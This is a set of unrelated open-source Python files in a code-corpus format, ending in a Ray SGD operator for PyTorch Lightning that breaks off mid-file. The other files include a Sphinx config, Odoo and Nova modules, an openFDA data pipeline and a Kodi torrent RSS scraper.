texinfo_documents = [
('index', 'Weblate', 'Weblate Documentation',
'Michal Čihař', 'Weblate', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = 'Weblate Documentation'
epub_author = 'Michal Čihař'
epub_publisher = 'Michal Čihař'
epub_copyright = '2012 - 2016, Michal Čihař'
# The basename for the epub file. It defaults to the project name.
#epub_basename = 'project'
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
epub_theme_options = {
'relbar1': False,
'footer': False,
}
# The language of the text. It defaults to the language option
# or en if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
epub_cover = ('_static/weblate.png', 'epub-cover.html')
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the PIL.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
graphviz_output_format = 'svg'
| dtschan/weblate | docs/conf.py | Python | gpl-3.0 | 10,574 |
from .. import app
from flask_sqlalchemy import SQLAlchemy
# Introduce the database.
db = SQLAlchemy(app)
| AndrewNeudegg/CIMC | CIMC/database/__init__.py | Python | mit | 107 |
# -*- coding: utf-8 -*-
# Copyright 2013-2017 Pedro M. Baeza <[email protected]>
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl.html).
from odoo import models, api
class BetterZipGeonamesImport(models.TransientModel):
_inherit = 'better.zip.geonames.import'
@api.model
def transform_city_name(self, city, country):
"""Change determinants casing."""
if country.code == 'ES':
return city.replace(' De ', ' de ').replace(' Del ', ' del ').\
replace(' La ', ' la ').replace(' Las ', ' las ').\
replace(' El ', ' el ').replace(' Los ', ' los ')
else:
return super(BetterZipGeonamesImport, self).transform_city_name(
city, country)
@api.model
def select_or_create_state(self, row, country, code_row_index=4,
name_row_index=3):
if country.code == 'ES':
code_row_index = 6
name_row_index = 5
return super(BetterZipGeonamesImport, self).select_or_create_state(
row, country, code_row_index=code_row_index,
name_row_index=name_row_index)
| factorlibre/l10n-spain | l10n_es_toponyms/wizard/geonames_import.py | Python | agpl-3.0 | 1,168 |
from api.mon.backends.zabbix.monitor import Zabbix, get_zabbix, del_zabbix
from api.mon.backends.zabbix.server import ZabbixMonitoringServer
get_monitoring = get_zabbix
del_monitoring = del_zabbix
MonitoringBackendClass = Zabbix
MonitoringServerClass = ZabbixMonitoringServer
__all__ = ('get_monitoring', 'del_monitoring', 'MonitoringBackendClass', 'MonitoringServerClass')
| erigones/esdc-ce | api/mon/backends/zabbix/__init__.py | Python | apache-2.0 | 379 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
from jottalib.monitor import ArchiveEventHandler
def test_correct_url(tmpdir):
tmpdir = str(tmpdir)
aeh = ArchiveEventHandler(None, tmpdir, "/TEST_ROOT")
filepath = os.path.join(tmpdir, "subdir", "correct_url.txt")
jottapath = aeh.get_jottapath(filepath)
assert jottapath == "/TEST_ROOT/subdir/correct_url.txt"
def test_weird_path_is_correct_url(tmpdir):
tmpdir = str(tmpdir)
aeh = ArchiveEventHandler(None, tmpdir, "/TEST_ROOT")
filepath = os.path.join(tmpdir, "subdir1", "..", "subdir2", "correct_url.txt")
jottapath = aeh.get_jottapath(filepath)
assert jottapath == "/TEST_ROOT/subdir2/correct_url.txt"
def test_filename_renamed(tmpdir):
tmpdir = str(tmpdir)
aeh = ArchiveEventHandler(None, tmpdir, "/TEST_ROOT")
filepath = os.path.join(tmpdir, "subdir", "first_url.txt")
jottapath = aeh.get_jottapath(filepath, "correct_url.txt")
assert jottapath == "/TEST_ROOT/subdir/correct_url.txt"
| cowai/jottalib | tests/test_archiveEventHandler.py | Python | gpl-3.0 | 1,018 |
# Copyright 2015 Intel Corp
# Copyright 2016 Hewlett Packard Enterprise Development Company LP
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from urllib import parse as urlparse
from oslo_db.exception import DBDuplicateEntry
from oslo_log import log as logging
from oslo_utils import strutils
from oslo_utils import timeutils
from oslo_utils import uuidutils
from nova.db import api as db
from nova import exception
from nova.i18n import _
from nova.objects import base
from nova.objects import fields
from nova import utils
LOG = logging.getLogger(__name__)
@base.NovaObjectRegistry.register
class ConsoleAuthToken(base.NovaTimestampObject, base.NovaObject):
# Version 1.0: Initial version
# Version 1.1: Add clean_expired_console_auths method.
# The clean_expired_console_auths_for_host method
# was deprecated.
VERSION = '1.1'
fields = {
'id': fields.IntegerField(),
'console_type': fields.StringField(nullable=False),
'host': fields.StringField(nullable=False),
'port': fields.IntegerField(nullable=False),
'internal_access_path': fields.StringField(nullable=True),
'instance_uuid': fields.UUIDField(nullable=False),
'access_url_base': fields.StringField(nullable=True),
# NOTE(PaulMurray): The unhashed token field is not stored in the
# database. A hash of the token is stored instead and is not a
# field on the object.
'token': fields.StringField(nullable=False),
}
@property
def access_url(self):
"""The access url with token parameter.
:returns: the access url with credential parameters
access_url_base is the base url used to access a console.
Adding the unhashed token as a parameter in a query string makes it
specific to this authorization.
"""
if self.obj_attr_is_set('id'):
if self.console_type == 'novnc':
# NOTE(melwitt): As of noVNC v1.1.0, we must use the 'path'
# query parameter to pass the auth token within, as the
# top-level 'token' query parameter was removed. The 'path'
# parameter is supported in older noVNC versions, so it is
# backward compatible.
qparams = {'path': '?token=%s' % self.token}
return '%s?%s' % (self.access_url_base,
urlparse.urlencode(qparams))
else:
return '%s?token=%s' % (self.access_url_base, self.token)
@staticmethod
def _from_db_object(context, obj, db_obj):
# NOTE(PaulMurray): token is not stored in the database but
# this function assumes it is in db_obj. The unhashed token
# field is populated in the authorize method after the token
# authorization is created in the database.
for field in obj.fields:
setattr(obj, field, db_obj[field])
obj._context = context
obj.obj_reset_changes()
return obj
@base.remotable
def authorize(self, ttl):
"""Authorise the console token and store in the database.
:param ttl: time to live in seconds
:returns: an authorized token
The expires value is set for ttl seconds in the future and the token
hash is stored in the database. This function can only succeed if the
token is unique and the object has not already been stored.
"""
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(
action='authorize',
reason=_('must be a new object to authorize'))
token = uuidutils.generate_uuid()
token_hash = utils.get_sha256_str(token)
expires = timeutils.utcnow_ts() + ttl
updates = self.obj_get_changes()
# NOTE(melwitt): token could be in the updates if authorize() has been
# called twice on the same object. 'token' is not a database column and
# should not be included in the call to create the database record.
if 'token' in updates:
del updates['token']
updates['token_hash'] = token_hash
updates['expires'] = expires
try:
db_obj = db.console_auth_token_create(self._context, updates)
db_obj['token'] = token
self._from_db_object(self._context, self, db_obj)
except DBDuplicateEntry:
# NOTE(PaulMurray) we are generating the token above so this
# should almost never happen - but technically its possible
raise exception.TokenInUse()
LOG.debug("Authorized token with expiry %(expires)s for console "
"connection %(console)s",
{'expires': expires,
'console': strutils.mask_password(self)})
return token
@base.remotable_classmethod
def validate(cls, context, token):
"""Validate the token.
:param context: the context
:param token: the token for the authorization
:returns: The ConsoleAuthToken object if valid
The token is valid if the token is in the database and the expires
time has not passed.
"""
token_hash = utils.get_sha256_str(token)
db_obj = db.console_auth_token_get_valid(context, token_hash)
if db_obj is not None:
db_obj['token'] = token
obj = cls._from_db_object(context, cls(), db_obj)
LOG.debug("Validated token - console connection is "
"%(console)s",
{'console': strutils.mask_password(obj)})
return obj
else:
LOG.debug("Token validation failed")
raise exception.InvalidToken(token='***')
@base.remotable_classmethod
def clean_console_auths_for_instance(cls, context, instance_uuid):
"""Remove all console authorizations for the instance.
:param context: the context
:param instance_uuid: the instance to be cleaned
All authorizations related to the specified instance will be
removed from the database.
"""
db.console_auth_token_destroy_all_by_instance(context, instance_uuid)
@base.remotable_classmethod
def clean_expired_console_auths(cls, context):
"""Remove all expired console authorizations.
:param context: the context
All expired authorizations will be removed.
Tokens that have not expired will remain.
"""
db.console_auth_token_destroy_expired(context)
# TODO(takashin): This method was deprecated and will be removed
# in a next major version bump.
@base.remotable_classmethod
def clean_expired_console_auths_for_host(cls, context, host):
"""Remove all expired console authorizations for the host.
:param context: the context
:param host: the host name
All expired authorizations related to the specified host
will be removed. Tokens that have not expired will
remain.
"""
db.console_auth_token_destroy_expired_by_host(context, host)
| klmitch/nova | nova/objects/console_auth_token.py | Python | apache-2.0 | 7,694 |
from rest_framework import serializers
from file_manager.models import FileManager
class FileManagerSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FileManager
fields = ('id', 'url', 'name', 'file')
| craigbruce/drf_sandbox | file_manager/serializer.py | Python | bsd-3-clause | 246 |
#!/usr/bin/python
''' 510k pipeline for downloading, transforming to JSON and loading into
Elasticsearch.
'''
import collections
import glob
import logging
import os
from os.path import basename, dirname, join
import sys
import arrow
import elasticsearch
import luigi
import requests
import simplejson as json
from openfda import common, config, elasticsearch_requests, index_util, parallel
from openfda import download_util
from openfda.device_clearance import transform
from openfda.device_harmonization.pipeline import (Harmonized2OpenFDA,
DeviceAnnotateMapper)
from openfda.index_util import AlwaysRunTask, ResetElasticSearch
RUN_DIR = dirname(dirname(os.path.abspath(__file__)))
BASE_DIR = './data/'
# A directory for holding files that track Task state
META_DIR = join(BASE_DIR, '510k/meta')
common.shell_cmd('mkdir -p %s', META_DIR)
CLEARED_DEVICE_URL = 'http://www.accessdata.fda.gov/premarket/ftparea/'
CLEARED_DEV_ZIPS = [CLEARED_DEVICE_URL + 'pmn96cur.zip',
CLEARED_DEVICE_URL + 'pmn9195.zip',
CLEARED_DEVICE_URL + 'pmn8690.zip',
CLEARED_DEVICE_URL + 'pmn8185.zip',
CLEARED_DEVICE_URL + 'pmn7680.zip']
class Download_510K(luigi.Task):
def requires(self):
return []
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k/raw'))
def run(self):
output_dir = self.output().path
for zip_url in CLEARED_DEV_ZIPS:
output_filename = join(output_dir, zip_url.split('/')[-1])
common.download(zip_url, output_filename)
class ExtractAndCleanDownloads510k(luigi.Task):
''' Unzip each of the download files and remove all the non-UTF8 characters.
Unzip -p streams the data directly to iconv which then writes to disk.
'''
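  # Roughly equivalent shell pipeline for one file (illustrative):
  #   unzip -p pmn96cur.zip | iconv -f ISO-8859-1 -t UTF-8 > pmn96cur.txt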
def requires(self):
return Download_510K()
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k/extracted'))
def run(self):
output_dir = self.output().path
common.shell_cmd('mkdir -p %s', output_dir)
input_dir = self.input().path
download_util.extract_and_clean(input_dir, 'ISO-8859-1', 'UTF-8', 'txt')
class Clearance2JSON(parallel.MRTask):
def map(self, key, value, output):
# TODO(hansnelsen): bring the `transform.py` logic into the mapper and
# remove the file.
new_value = transform.transform_device_clearance(value)
output.add(self.filename + ':' + key, new_value)
def requires(self):
return ExtractAndCleanDownloads510k()
def output_format(self):
return parallel.JSONLineOutput()
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k', 'json.db'))
def mapreduce_inputs(self):
input_files = glob.glob(self.input().path + '/*.txt')
return parallel.Collection.from_glob(
input_files, parallel.CSVDictLineInput(delimiter='|', strip_str='\0'))
class ClearanceAnnotateMapper(DeviceAnnotateMapper):
def filter(self, data):
product_code = data['product_code']
harmonized = self.harmonized_db.get(product_code, None)
if harmonized:
# 510k should never have a PMA openfda key
if 'device_pma' in harmonized:
del harmonized['device_pma']
if self.table in harmonized:
del harmonized[self.table]
return harmonized
return None
class AnnotateDevice(luigi.Task):
def requires(self):
return [Harmonized2OpenFDA(), Clearance2JSON()]
def output(self):
return luigi.LocalTarget(join(BASE_DIR, '510k','annotate.db'))
def run(self):
harmonized_db = parallel.ShardedDB.open(self.input()[0].path).as_dict()
parallel.mapreduce(
parallel.Collection.from_sharded(self.input()[1].path),
mapper=ClearanceAnnotateMapper(harmonized_db=harmonized_db),
reducer=parallel.IdentityReducer(),
output_prefix=self.output().path,
num_shards=10)
class LoadJSON(index_util.LoadJSONBase):
index_name = 'deviceclearance'
type_name = 'device510k'
mapping_file = './schemas/clearance_mapping.json'
data_source = AnnotateDevice()
use_checksum = False
if __name__ == '__main__':
luigi.run()
| HiTechIronMan/openfda | openfda/device_clearance/pipeline.py | Python | cc0-1.0 | 4,009 |
from kmediatorrent import plugin
from kmediatorrent.scrapers import scraper
from kmediatorrent.ga import tracked
from kmediatorrent.caching import cached_route
from kmediatorrent.utils import ensure_fanart
# Temporary, will be fixed later by them
BASE_URL = "%s/" % plugin.get_setting("base_nyaa")
HEADERS = {
"Referer": BASE_URL,
}
CATEGORIES = [
("Anime", "1_0", (
("English-translated Anime", "1_37"),
("Raw Anime", "1_11"),
("Non-English-translated Anime", "1_38"),
("Anime Music Video", "1_32"),
)),
("Live Action (movies)", "5_0", (
("English-translated Live Action", "5_19"),
("Raw Live Action", "5_20"),
("Non-English-translated Live Action", "5_21"),
("Live Action Promotional Video", "5_22"),
)),
]
SORT_DATE = 1
SORT_SEEDERS = 2
SORT_LEECHERS = 3
SORT_DOWNLOADS = 4
SORT_SIZE = 5
SORT_NAME = 6
SORT_DESCENDING = 1
SORT_ASCENDING = 2
# Cache TTLs
DEFAULT_TTL = 2 * 3600 # 2 hours
@scraper("%s"%plugin.get_setting("nyaa_label"), "%s"%plugin.get_setting("nyaa_picture"))
@plugin.route("/nyaa")
@tracked
def nyaa_index():
yield {"label": "Search", "path": plugin.url_for("nyaa_search")}
def make_cats(root, prefix=""):
for cat in root:
yield {
"label": "%s%s" % (prefix, cat[0]),
"path": plugin.url_for("default_nyaa_page", cats=cat[1], offset=0, sort=SORT_SEEDERS, order=SORT_DESCENDING),
}
if len(cat) > 2:
for entry in make_cats(cat[2], prefix="%s " % prefix):
yield entry
for cat in make_cats(CATEGORIES):
yield cat
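# For illustration, make_cats() flattens the CATEGORIES table above into menu
# entries roughly like:
#   Anime
#    English-translated Anime
#    Raw Anime
#    ...
#   Live Action (movies)
#    English-translated Live Action
#    ...
# with one extra leading space added to the label per nesting level.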
@plugin.route("/nyaa/show/<cats>/<offset>/<sort>/<order>")
@tracked
def default_nyaa_page(cats, offset, sort, order):
return nyaa_page(cats, offset, sort, order)
@plugin.route("/nyaa/search/<term>/<offset>/<sort>/<order>")
@tracked
def search_result_page(term, offset, sort, order):
return nyaa_page("1_0", offset, sort, order, term)
def nyaa_page(cats, offset, sort, order, term=""):
from kmediatorrent.scrapers import rss
from kmediatorrent.utils import url_get
offset = int(offset)
rss_data = url_get(BASE_URL, headers=HEADERS, params={
"cats": cats,
"offset": "%d" % offset,
"sort": sort,
"order": order,
"term": term,
"page": "rss",
})
for item in rss.parse(rss_data):
yield item
yield {
"label": ">> Next page",
"path": plugin.url_for(term and "search_result_page" or "default_nyaa_page", cats=cats, sort=sort, order=order, term=term, offset=offset + 1),
"is_playable": False,
}
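# For reference, the RSS request built above looks roughly like this
# (parameter values are illustrative):
#   GET <base_nyaa>/?cats=1_37&offset=0&sort=2&order=1&term=&page=rss
# and the ">> Next page" entry simply re-issues the same query with offset+1.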
@plugin.route("/nyaa/search")
@tracked
def nyaa_search():
query = plugin.request.args.get("query")
if query:
query = query[0]
else:
query = plugin.keyboard("", "kmediatorrent - NyaaTorrents - Search")
if query:
plugin.redirect(plugin.url_for("search_result_page", page="search", cats="0_0", filter=0, term=query, offset=1, sort=SORT_DATE, order=SORT_DESCENDING))
| jmarth/plugin.video.kmediatorrent | resources/site-packages/kmediatorrent/scrapers/nyaa.py | Python | gpl-3.0 | 3,074 |
import inspect
import logging
import torch
from pytorch_lightning.core.step_result import Result
from pytorch_lightning.overrides.data_parallel import LightningDistributedDataParallel
from pytorch_lightning.utilities.model_utils import is_overridden
from pytorch_lightning.trainer.model_hooks import TrainerModelHooksMixin
from pytorch_lightning.trainer.optimizers import TrainerOptimizersMixin
import pytorch_lightning as ptl
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from pytorch_lightning.utilities.memory import recursive_detach
from ray.util.annotations import Deprecated
from ray.util.sgd.torch import TrainingOperator
from ray.util.sgd.torch.constants import (
NUM_STEPS,
SCHEDULER_STEP_BATCH,
SCHEDULER_STEP_EPOCH,
)
from ray.util.sgd.utils import AverageMeterCollection, NUM_SAMPLES
tqdm = None
try:
from tqdm import tqdm
except ImportError:
pass
logger = logging.getLogger(__name__)
@Deprecated
class LightningOperator(
TrainingOperator, TrainerModelHooksMixin, TrainerOptimizersMixin
):
"""A subclass of TrainingOperator created from a PTL ``LightningModule``.
    This class is returned by `TrainingOperator.from_ptl` and its training
    state is defined by the Pytorch Lightning ``LightningModule`` that is
    passed into `from_ptl`. Training and validation functionality has
already been implemented according to
Pytorch Lightning's Trainer. But if you need to modify training,
you should subclass this class and override the appropriate methods
before passing in the subclass to `TorchTrainer`.
.. code-block:: python
MyLightningOperator = TrainingOperator.from_ptl(
MyLightningModule)
trainer = TorchTrainer(training_operator_cls=MyLightningOperator,
...)
"""
def _configure_apex_amp(self, amp, models, optimizers, apex_args=None):
assert len(models) == 1
model = models[0]
assert isinstance(model, ptl.LightningModule)
model, optimizers = model.configure_apex(amp, model, optimizers, amp_level="O2")
return [model], optimizers
def _configure_ddp(self, models, device_ids, ddp_args=None):
assert len(models) == 1
model = models[0]
assert isinstance(model, ptl.LightningModule)
model = LightningDistributedDataParallel(
model, device_ids=device_ids, find_unused_parameters=True
)
return [model]
@property
def model(self):
"""The LightningModule to use for training.
The returned model is wrapped in DDP if using distributed training.
"""
return self._model
@property
def scheduler_dicts(self):
"""Returns list of scheduler dictionaries.
List is empty if no schedulers are returned in the
configure_optimizers method of your LightningModule.
Default configuration is used if configure_optimizers
returns scheduler objects.
See
https://pytorch-lightning.readthedocs.io/en/latest/lightning_module.html#configure-optimizers
"""
return self._scheduler_dicts
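    # For reference, a scheduler dictionary returned from a LightningModule's
    # configure_optimizers typically looks like the sketch below (the optimizer
    # and scheduler here are hypothetical, not part of this operator):
    #
    #   def configure_optimizers(self):
    #       optimizer = torch.optim.SGD(self.parameters(), lr=0.1)
    #       scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1)
    #       return [optimizer], [{"scheduler": scheduler,
    #                             "interval": "epoch",
    #                             "frequency": 1}]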
@property
def optimizers(self):
"""Returns list of optimizers as returned by configure_optimizers."""
return self._optimizers
@property
def schedulers(self):
"""Returns list of schedulers as returned by configure_optimizers.
List is empty if no schedulers are returned in configure_optimizers.
"""
return self._schedulers
def get_model(self):
"""Returns original LightningModule, not wrapped in DDP."""
if isinstance(self.model, LightningDistributedDataParallel):
return self.model.module
else:
return self.model
def setup(self, config):
# Pass in config if ptl_module accepts it.
ptl_class = self.__class__._lightning_module_cls
if not issubclass(ptl_class, ptl.LightningModule):
raise TypeError(
"Argument must be subclass of "
"pytorch_lightning.LightningModule. Got class {} "
"instead.".format(ptl_class)
)
if "config" in inspect.signature(ptl_class.__init__).parameters:
ptl_module = ptl_class(config=config)
else:
ptl_module = ptl_class()
# This is needed for LightningDistributedDataParallel.
ptl_module.testing = False
# Call on_fit_start on instantiation.
if self.is_function_implemented("on_fit_start", ptl_module):
ptl_module.on_fit_start()
# Only run data preparation once per node.
if self.local_rank == 0 and self.is_function_implemented(
"prepare_data", ptl_module
):
ptl_module.prepare_data()
# Call model.setup.
ptl_module.setup("fit")
if not is_overridden("configure_optimizers", ptl_module):
raise MisconfigurationException(
"No `configure_optimizers()` method defined."
)
optimizers, self._scheduler_dicts, optimizer_frequencies = self.init_optimizers(
model=ptl_module
)
if len(optimizer_frequencies) > 0:
logger.warning(
"Optimizer frequencies will be ignored. When "
"passing in multiple optimizers, you should "
"implement your own custom training loop."
)
lr_schedulers = []
for scheduler in self.scheduler_dicts:
if isinstance(scheduler, dict):
# A scheduler dictionary is passed in.
if (
"reduce_on_plateau" in scheduler
and "monitor" in scheduler
and scheduler["reduce_on_plateau"] is True
):
logger.info(
"reduce_on_plateau and monitor will be "
"ignored "
"from the scheduler dict {}. To update a "
"ReduceLROnPlateau scheduler, you should use "
"TorchTrainer.update_schedulers.".format(scheduler)
)
if "frequency" in scheduler and scheduler["frequency"] > 1:
logger.info(
"frequency will be ignored from the "
"scheduler dict {}.".format(scheduler)
)
lr_schedulers.append(scheduler["scheduler"])
else:
lr_schedulers.append(scheduler)
# Set this so register doesn't complain.
self._scheduler_step_freq = "ptl"
ddp_model, self._optimizers, self._schedulers = self.register(
models=[ptl_module], optimizers=optimizers, schedulers=lr_schedulers
)
assert len(ddp_model) == 1
self._model = ddp_model[0]
model = self.get_model()
if self.is_function_implemented("on_pretrain_routine_start", model):
model.on_pretrain_routine_start()
train_data_loader = None
if self.__class__._train_dataloader:
train_data_loader = self.__class__._train_dataloader
elif self.is_function_implemented("train_dataloader", model):
train_data_loader = model.train_dataloader()
val_data_loader = None
if self.__class__._val_dataloader:
val_data_loader = self.__class__._val_dataloader
elif self.is_function_implemented("val_dataloader", model):
val_data_loader = model.val_dataloader()
self.register_data(
train_loader=train_data_loader, validation_loader=val_data_loader
)
def train_epoch(self, iterator, info):
model = self.get_model()
# Enable train mode.
self.model.train()
# Enable gradients.
torch.set_grad_enabled(True)
if self.is_function_implemented("on_train_epoch_start", model):
model.on_train_epoch_start()
if self.use_tqdm and self.world_rank == 0:
desc = ""
if info is not None and "epoch_idx" in info:
if "num_epochs" in info:
desc = f"{info['epoch_idx'] + 1}/{info['num_epochs']}e"
else:
desc = f"{info['epoch_idx'] + 1}e"
# TODO: Implement len for Dataset?
total = info[NUM_STEPS]
if total is None:
if hasattr(iterator, "__len__"):
total = len(iterator)
_progress_bar = tqdm(total=total, desc=desc, unit="batch", leave=False)
# Output for each batch.
epoch_outputs = []
for batch_idx, batch in enumerate(iterator):
batch_info = {"batch_idx": batch_idx, "global_step": self.global_step}
batch_info.update(info)
batch_output = self.train_batch(batch, batch_info=batch_info)
# batch output for each optimizer.
epoch_outputs.append(batch_output)
should_stop = batch_output["signal"] == -1
if self.use_tqdm and self.world_rank == 0:
_progress_bar.n = batch_idx + 1
postfix = {}
if "training_loss" in batch_output:
postfix.update(loss=batch_output["training_loss"])
_progress_bar.set_postfix(postfix)
for s_dict, scheduler in zip(self.scheduler_dicts, self.schedulers):
if s_dict["interval"] == SCHEDULER_STEP_BATCH:
scheduler.step()
self.global_step += 1
if should_stop:
break
processed_outputs = None
if is_overridden("training_epoch_end", model):
raw_outputs = [eo["raw_output"] for eo in epoch_outputs]
processed_outputs = model.training_epoch_end(raw_outputs)
if processed_outputs is not None:
if isinstance(processed_outputs, torch.Tensor):
return_output = {"train_loss": processed_outputs}
elif isinstance(processed_outputs, Result):
raise ValueError(
"Result objects are not supported. Please "
"return a dictionary instead."
)
elif isinstance(processed_outputs, dict):
return_output = processed_outputs
else:
raise TypeError(
"training_epoch_end returned an invalid "
"type. It must return a Tensor, Result, "
"or dict."
)
else:
# User did not override training_epoch_end
assert isinstance(epoch_outputs, list)
# Use AverageMeterCollection util to reduce results.
meter_collection = AverageMeterCollection()
for o in epoch_outputs:
num_samples = o.pop(NUM_SAMPLES, 1)
raw_output = o["raw_output"]
if isinstance(raw_output, dict):
meter_collection.update(raw_output, num_samples)
elif isinstance(raw_output, torch.Tensor):
meter_collection.update(
{"train_loss": o["training_loss"]}, num_samples
)
return_output = meter_collection.summary()
if self.is_function_implemented("on_train_epoch_end", model):
model.on_train_epoch_end([eo.get("raw_output") for eo in epoch_outputs])
for s_dict, scheduler in zip(self.scheduler_dicts, self.schedulers):
if s_dict["interval"] == SCHEDULER_STEP_EPOCH:
scheduler.step()
return return_output
def train_batch(self, batch, batch_info):
# Get the original PTL module.
model = self.get_model()
optimizer = self.optimizers[0]
batch_idx = batch_info["batch_idx"]
epoch_idx = batch_info["epoch_idx"]
if self.is_function_implemented("on_train_batch_start", model):
response = model.on_train_batch_start(
batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
# Skip remainder of epoch if response is -1.
if response == -1:
return {"signal": -1}
args = [batch, batch_idx]
if len(self.optimizers) > 1:
if self.has_arg("training_step", "optimizer_idx"):
args.append(0)
with self.timers.record("fwd"):
if self._is_distributed:
# Use the DDP wrapped model (self.model).
output = self.model(*args)
elif self.use_gpu:
# Using single GPU.
# Don't copy the batch since there is a single gpu that
# the batch could be referenced from and if there are
# multiple optimizers the batch will wind up copying it to
# the same device repeatedly.
device = self.device
batch = model.transfer_batch_to_device(batch, device=device)
args[0] = batch
output = model.training_step(*args)
else:
# Using CPU.
output = model.training_step(*args)
if isinstance(output, Result):
raise ValueError(
"TrainResult objects are not supported. Please "
"return a dictionary instead."
)
# allow any mode to define training_step_end
        # do something with all the dp outputs (like softmax)
if is_overridden("training_step_end", model):
output = model.training_step_end(output)
# Extract loss from output if dictionary.
try:
loss = output["loss"]
except Exception:
if isinstance(output, torch.Tensor):
loss = output
else:
raise RuntimeError(
"No `loss` value in the dictionary returned from "
"`model.training_step()`."
)
# If output contains tensors, detach them all.
if isinstance(output, torch.Tensor):
output = output.detach()
elif isinstance(output, dict):
output = recursive_detach(output)
else:
raise TypeError(
"training_step returned invalid type. It must "
"return either a Tensor, Result, or dict."
)
untouched_loss = loss.detach().clone()
with self.timers.record("grad"):
if self.use_fp16_apex:
with self._amp.scale_loss(loss, optimizer) as scaled_loss:
model.backward(scaled_loss, optimizer, optimizer_idx=0)
else:
model.backward(loss, optimizer, optimizer_idx=0)
if self.is_function_implemented("on_after_backward", model):
model.on_after_backward()
with self.timers.record("apply"):
optimizer.step()
model.on_before_zero_grad(optimizer)
model.optimizer_zero_grad(
epoch=epoch_idx, batch_idx=batch_idx, optimizer=optimizer, optimizer_idx=0
)
if self.is_function_implemented("on_train_batch_end", model):
model.on_train_batch_end(
outputs=output, batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
return {
"signal": 0,
"training_loss": untouched_loss.item(),
"raw_output": output,
# NUM_SAMPLES: len(batch)
}
def validate(self, val_iterator, info):
self.model.zero_grad()
self.model.eval()
torch.set_grad_enabled(False)
model = self.get_model()
if self.is_function_implemented("on_validation_epoch_start", model):
model.on_validation_epoch_start()
val_outputs = []
for batch_idx, batch in enumerate(val_iterator):
batch_info = {"batch_idx": batch_idx}
batch_info.update(info)
batch_output = self.validate_batch(batch, batch_info)
if batch_output is not None:
val_outputs.append(batch_output)
processed_outputs = None
if is_overridden("validation_epoch_end", model):
raw_outputs = [vo["raw_output"] for vo in val_outputs]
            processed_outputs = model.validation_epoch_end(raw_outputs)
if processed_outputs is not None:
if isinstance(processed_outputs, torch.Tensor):
return_output = {"val_loss": processed_outputs}
elif isinstance(processed_outputs, Result):
raise ValueError(
"Result objects are not supported. Please "
"return a dictionary instead."
)
elif isinstance(processed_outputs, dict):
return_output = processed_outputs
else:
raise TypeError(
"validation_epoch_end returned an invalid "
"type. It must return a Tensor, Result, "
"or dict."
)
else:
            # User did not override validation_epoch_end
assert isinstance(val_outputs, list)
# Use AverageMeterCollection util to reduce results.
meter_collection = AverageMeterCollection()
for v in val_outputs:
num_samples = v.pop(NUM_SAMPLES, 1)
raw_output = v["raw_output"]
if isinstance(raw_output, dict):
meter_collection.update(raw_output, num_samples)
elif isinstance(raw_output, torch.Tensor):
meter_collection.update(
{"val_loss": raw_output.item()}, num_samples
)
return_output = meter_collection.summary()
if self.is_function_implemented("on_validation_epoch_end", model):
model.on_validation_epoch_end()
# Set back to True so training will work.
torch.set_grad_enabled(True)
return return_output
def validate_batch(self, batch, batch_info):
model = self.get_model()
batch_idx = batch_info["batch_idx"]
if is_overridden("on_validation_batch_start", model):
model.on_validation_batch_start(
batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
args = [batch, batch_idx]
with self.timers.record("eval_fwd"):
if self._is_distributed:
# Use the DDP wrapped model (self.model).
output = self.model(*args)
elif self.use_gpu:
# Using single GPU.
device = self.device
batch = model.transfer_batch_to_device(batch, device=device)
args[0] = batch
output = model.validation_step(*args)
else:
# Using CPU.
output = model.validation_step(*args)
if isinstance(output, Result):
raise ValueError(
"EvalResult objects are not supported. Please "
"return a dictionary instead."
)
        if is_overridden("validation_step_end", model):
output = model.validation_step_end(output)
if self.is_function_implemented("on_validation_batch_end", model):
model.on_validation_batch_end(
outputs=output, batch=batch, batch_idx=batch_idx, dataloader_idx=0
)
return {
"raw_output": output,
# NUM_SAMPLES: len(batch)
}
def state_dict(self):
state_dict = {}
self.get_model().on_save_checkpoint(checkpoint=state_dict)
return state_dict
def load_state_dict(self, state_dict):
